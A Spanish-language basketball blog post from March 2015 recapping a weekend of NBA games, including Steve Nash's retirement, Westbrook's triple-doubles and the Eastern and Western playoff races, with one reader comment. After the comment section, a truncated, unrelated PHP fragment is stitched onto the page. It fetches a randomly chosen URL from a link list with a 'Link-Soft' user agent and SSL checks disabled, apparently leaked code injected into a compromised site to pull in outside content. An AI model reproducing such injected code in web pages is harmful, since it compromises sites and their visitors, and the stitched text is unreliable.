Informe Fin de Semana: Good Bye, Mr. Nash

23 de March de 2015 por TheDeerHunter

Para aquellos que estéis prestando más atención a la March Madness que a la NBA, os irá bien que alguien comente un poco qué es lo que está aconteciendo estos días para no perder demasiado el hilo. El sábado nos topamos con el anuncio de retirada (esperada) de un grande, el doble ganador del MVP y uno de los mejores pasadores que hayamos visto, Steve Nash. Se va sin el ansiado anillo pero lideró un cambio en la filosofía del grueso de la liga demostrando que el juego ultra-ofensivo no necesariamente tenía que estar reñido con la competitividad.

Ahora, vamos con el repaso de lo ocurrido sobre la cancha.

El viernes, Westbrook volvió a comprar papeletas para el MVP con su 9º triple doble. Con su inenarrable actuación, los Thunder fueron capaces de doblegar nada menos que a los Hawks, dándose un chute de confianza para sobreponerse a las adversidades en forma de lesión. Tendría un punto de irónico que los dos cracks de Oklahoma se alternaran el título de mejor jugador del año, habiendo sumado sus mayores méritos precisamente en ausencia del otro. La jornada resultó inmejorable para los Thunder, pues los Pelicans cayeron en casa de los líderes y se abría una pequeña brecha clasificatoria entre ellos.

Además de estos dos partidos, la jornada del viernes fue fabulosa. Vimos hasta tres prórrogas en el Bucks@Nets con Brook López atrapando, agarraos a la silla, nada menos que 18 rebotes para añadir a sus 32 puntos. Ojo que Pachulia estuvo tonteando con el triple doble. Casi lo hemos visto todo.

En persecución de los dos líderes, por un lado los Cavs disfrutaron de uno de esos últimos cuartos imparables de LeBron para ganar apurados a los Pacers y los Grizzlies tiraron de su típico oficio para llevarse la victoria de Dallas. Vimos un Mirotic desatado en un convincente triunfo de los Bulls sobre Toronto pero un Payton firmando su segundo triple doble de la noche llevando a Orlando a la sorpresa del día ante Portland; también un Chris Paul mágico ante Wall y sus Wizards; Kawhi Leonard liderando a los Spurs ante Celtics; Wade otra vez como el mejor de los Heat ante Denver y Gay metiéndoles 33 a los Hornets. En el duelo de bandas del Este los Sixers se impusieron a los Knicks con un gran Noel.

El sábado, vimos otra victoria cómoda de los Warriors ante Utah; a los Grizzlies sacando ventaja del enfrentamiento ante unos mermados Blazers con los que la maldición de las lesiones vuelve a cebarse (esta vez, LaMarcus y Batum); la destroza que les causó Bledsoe a los Rockets; la nueva derrota de los Pacers que tampoco pudieron controlar a Brook Lopez y la remontada que permitieron los Bulls en Detroit a pesar de otro gran partido de Pau.

Ayer domingo, nuevo giro en la clasificación del Oeste por lo que respecta a la octava posición. Ahora el propietario son los Hornets, que ganaron a los Wolves y aprovecharon la racha de derrotas de Pacers y Celtics. Los de Boston tropezaron en casa y tras una prórroga ante los Pistons. También perdieron Miami frente a OKC (nuevo triple doble de Westbrook, aunque éste bastante ruín) y los Bucks, arrasados por los Cavs en la segunda parte y que ya suman seis derrotas seguidas. Con este panorama, los Nets solo han necesitado ganar dos partidos seguidos para volver a meterse de lleno en la pugna por una plaza de Playoffs, y ahora mismo todo es posible entre las posiciones 6ª a 11ª.

Por arriba, lo de los Hawks empieza a ser preocupante, no por su primera plaza, que parece asegurada (mantienen 8 partidos de ventaja sobre Cleveland), sino por las sensaciones que transmiten últimamente. Anoche fueron aplastados en su casa frente a los Spurs, que al final acabarán la regular season en la zona alta del cuadro. Los Wizards volvieron a ofrecer su cara mala para perder estrepitosamente en Sacramento y los Raptors no necesitaron a Lowry para superar sin complicaciones a los Knicks y volver a colocarse terceros del Este.

En el Oeste, los Pelicans se nos van cayendo y es lógico dada la mala suerte que están teniendo con las lesiones. El regreso de Anthony Davis ha coincidido con la baja de Tyreke (sumada a Ryan Anderson y Holiday) y, tras perder anoche en pista de los Clippers, ya van tres derrotas consecutivas, que contrastan con la racha ganadora de Phoenix. Los Suns superaron anoche a los Mavs, acumulan cuatro partidos sin perder y se han puesto novenos. Aunque si los Thunder mantienen su línea ascendente es posible que hasta le disputen la séptima plaza a los Mavs. Además de la contundente victoria de los Nuggets en Orlando, nos hemos dejado lo mejor para el final: un Sixers @ Lakers en el que Jeremy Lin fue la estrella y los de Philadelphia reforzaron con una derrota sus perspectivas de cara al draft.

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Parece que lo más divertido de ver de aquí a final de la temporada será ese duelo por los PO del este.Oklahoma lo tiene hecho,toda vez que se pensaba que caerían ante Atlanta y pasaron el examen con nota.

    Cleveland asegura matemáticamente la postemporada,será la primera vez que se vea a Irving y Love en esos lares,a ver qué nivel dan.Se está poniendo el asunto para que sea Miami el rival en PO,salvo que continué la tendencia a la baja de los Bucks (que tiene pinta). Que caprichoso el destino en ocasiones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>